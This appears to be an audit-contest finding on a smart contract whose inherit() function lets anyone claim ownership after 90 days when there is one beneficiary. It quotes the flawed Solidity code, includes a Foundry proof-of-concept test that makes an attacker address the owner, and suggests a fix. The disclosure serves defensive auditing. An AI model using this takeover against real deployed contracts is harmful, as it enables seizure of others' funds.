Submission Details
Severity:
Anyone can take ownership of smart contract
Summary
After 90 days, Anyone is able to call the inherit function and take ownership of the smart contract.
Vulnerability Details
After 90 days, if beneficiaries.length is equal 1 , Anyone is able to call the inherit function and take ownership of the smart contract.
function inherit() external { // @audit-info Anyone can call 'inherit'
if (block.timestamp < getDeadline()) {
revert InactivityPeriodNotLongEnough();
}
if (beneficiaries.length == 1) {
owner = msg.sender; // @audit-issue [HIGH] - Anyone can take ownership of smart contract
_setDeadline();
} else if (beneficiaries.length > 1) {
isInherited = true;
} else {
revert InvalidBeneficiaries();
}
}
POC
function testPOC() public {
address attacker1 = makeAddr("attacker1");
vm.warp(1);
vm.startPrank(owner);
im.addBeneficiery(user1);
vm.stopPrank();
vm.warp(1 + 90 days);
vm.startPrank(attacker1);
im.inherit();
assertEq(attacker1, im.getOwner());
vm.stopPrank();
}
Impact
Funds Risky and Total Control of smart contract
Tool Used
Manual Review ^^
Recommendations
consider using a modifier checking if msg.sender is a beneficiary to able call `inherit`
Updates
Lead Judging Commences
0xtimefliez 6 months ago
Submission Judgement Published Assigned finding tags:
Inherit depends on msg.sender so anyone can claim the contract
Rewards breakdown
nSLOC
211This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.